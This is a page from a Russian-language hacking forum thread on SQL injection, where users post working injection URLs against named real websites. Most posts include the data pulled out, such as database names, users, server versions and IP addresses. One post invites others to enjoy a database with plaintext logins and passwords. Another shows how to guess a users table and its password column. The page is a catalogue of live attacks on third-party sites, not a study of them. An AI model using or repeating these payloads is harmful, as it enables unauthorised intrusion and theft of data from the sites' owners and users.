HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1401 из 1604 « Первая < 401901130113511391 1397 1398 1399 1400 1401 1402 1403 1404 1405 141114511501 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14001  
Старый 06.06.2011, 13:10
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию
http://uprava.org/section.php?id=19&sub_id=-167%20and%201=2%20union%20select%201,2,3,4,concat_ ws(0x3a,@@version,user(),database(),@@version_comp ile_os)+--

4.0.27-log uprava-org@fhe2.hoster.ru uprava-org portbld-freebsd7.0
 
Ответить с цитированием

  #14002  
Старый 06.06.2011, 20:45
OnlyOn
Guest
Сообщений: n/a
Провел на форуме:
84406

Репутация: 36
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//eurozvuk.ru/gallery/index.php?id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x[/COLOR][/COLOR] 
Цитата:
Сообщение от None  
Target: http://eurozvuk.ru/gallery/index.php?id=2384
Host IP: 77.222.40.186
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8o mod_dp20/0.99.2 mod_python/3.3.1 Python/2.6.6 mod_ruby/1.2.6 Ruby/1.8.7(2010-08-16) mod_wsgi/3.3
DB Server: MySQL >=5
Resp. Time(avg): 475 ms
Current User: eurozvuk@localhost
Sql Version: 5.1.50-lk-log
Current DB: eurozvuk
System User: eurozvuk@localhost
Host Name: mesa
Installation dir: /usr/
Яндекс тИЦ (CY) 70

Google PageRank (PR) 3
 
Ответить с цитированием

  #14003  
Старый 06.06.2011, 21:20
OnlyOn
Guest
Сообщений: n/a
Провел на форуме:
84406

Репутация: 36
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//gretta.ru/catalog/card.php?cat=palio&id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--+a[/COLOR][/COLOR] 
Цитата:
Сообщение от None  
Target: http://gretta.ru/catalog/card.php?cat=palio&id=1636
Host IP: 78.110.50.127
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 205 ms
Current User: icy0u3fz_gal2@c25-w.ht-systems.ru
Sql Version: 5.0.85-log
Current DB: icy0u3fz_gal2
System User: icy0u3fz_gal2@c25-w.ht-systems.ru
Host Name: db14.ht-systems.ru
Installation dir: /usr/local/
DB User: 'icy0u3fz_gal2'@'%'
Data Bases: information_schema
icy0u3fz_gal2
Яндекс тИЦ (CY) 100

Google PageRank (PR) 2
 
Ответить с цитированием

  #14004  
Старый 06.06.2011, 21:33
OnlyOn
Guest
Сообщений: n/a
Провел на форуме:
84406

Репутация: 36
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//landscrona.ru/tales/index.php?id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--[/COLOR][/COLOR] 
Цитата:
Сообщение от None  
Target: http://landscrona.ru/tales/index.php?id=125
Host IP: 93.100.182.251
Powered-by: PHP/5.2.6-1+lenny10
Web Server: lighttpd/1.4.19
DB Server: MySQL >=5
Resp. Time(avg): 325 ms
Current User: ultrspru_data@localhost
Sql Version: 5.0.51a-24+lenny5
Current DB: ultrspru_data
System User: ultrspru_data@localhost
Host Name: landscrona
Installation dir: /usr/
DB User: 'ultrspru_data'@'localhost'
Data Bases: information_schema
ultrspru_data
Яндекс тИЦ (CY) 160

Google PageRank (PR) 3
 
Ответить с цитированием

  #14005  
Старый 06.06.2011, 22:03
OnlyOn
Guest
Сообщений: n/a
Провел на форуме:
84406

Репутация: 36
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//resurs.ua/index.php?id=2&more=21+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1[/COLOR][/COLOR] 
Цитата:
Сообщение от None  
Target: http://resurs.ua/index.php?id=2&more=21
Host IP: 91.197.128.231
Powered-by: PHP/5.2.13
Web Server: lighttpd/1.4.26
DB Server: MySQL error based
Resp. Time(avg): 80 ms
Sql Version: 5.0.77
Current DB: resursbase
Host Name: amgroup01.art-hosting.net.ua
Installation dir: /usr/
Яндекс тИЦ (CY) 30

Google PageRank (PR) 2

Тут БД с логин-пасс в открытом виде. Наслаждайтесь. Пару мыльников попалось с довольно таки крутыми доменами XD
 
Ответить с цитированием

  #14006  
Старый 07.06.2011, 11:46
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
http://www.benzrealty.com.au/content.php?page_id=-8+/*!UnIon+selECt+version%28%29*/

5.1.52
 
Ответить с цитированием

  #14007  
Старый 07.06.2011, 21:15
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
crime-maps.org

http://crime-maps.org/documentation_centre/centre/newsletter/newsletter_issue.php?i_=-45+union+select+1,concat%28file_priv,0x3a3a,User%2 9,3+from+mysql.user+limit+0,1--+&a_=395
 
Ответить с цитированием

  #14008  
Старый 07.06.2011, 21:26
monstr3
Новичок
Регистрация: 17.11.2008
Сообщений: 6
Провел на форуме:
27527

Репутация: 0
Отправить сообщение для monstr3 с помощью ICQ
По умолчанию
Таким образом подбираем существующую таблицу:

Цитата:
Сообщение от None  
http://www.photoindustria.ru/?mod=contest&id=14+union+select+null,null,null,nul l,null,null+from+ABCDEF
Если ABCDEF заменить на USERS - запроспроходит.

Далее подбираем поля:

Цитата:
Сообщение от None  
http://www.photoindustria.ru/?mod=contest&id=14+union+select+users.pass,null,nu ll,null,null,null+from+users
Если вместо pass написать password - запрос проходит.
 
Ответить с цитированием

  #14009  
Старый 08.06.2011, 21:07
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию
Код:
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,10,%2011,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+
 
Ответить с цитированием

  #14010  
Старый 09.06.2011, 04:25
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
pr5 ТИЦ 20

Цитата:
Сообщение от None  
http://www.fenetreeurope.com/php/page.php?section=actu&id=-21190%27+union+select+1,2,3,4,concat_ws%280x3a,use r%28%29,version%28%29,database%28%29%29,6,7+--+
fenetreeurope@localhost:5.0.45:dbfenetreeurope

pr1

Цитата:
Сообщение от None  
http://buket-iz-konfet.com.ua/pages.php?page=14+union+select+1,2,3,concat_ws(0x3 a,user(),version(),database())+--+
buketizkonfet@localhost:5.1.51:buketizkonfet

pr2

Цитата:
Сообщение от None  
http://tonometr-shop.com.ua/pages.php?page=13+union+select+1,2,3,concat_ws%280 x3a,user%28%29,version%28%29,database%28%29%29--
buketizkonfet@localhost:5.1.51:buketizkonfet

Цитата:
Сообщение от None  
http://www.kharkovapartment.com.ua/order.php?id=17000+union+select+1,concat_ws%280x3a ,user%28%29,version%28%29,database%28%29%29+--+
kharkovapartment@localhost:4.0.27:kharkovapartment

Цитата:
Сообщение от None  
https://www.davidrayrobinson.com/order.php?id=-1+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION +SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID %28%28select+concat_ws%280x3a,user%28%29,version%2 8%29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%28 0%29*2%29%29%29--+
drobinson@localhost:5.0.27:business_data
 
Ответить с цитированием
Ответ
Страница 1401 из 1604 « Первая < 401901130113511391 1397 1398 1399 1400 1401 1402 1403 1404 1405 141114511501 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ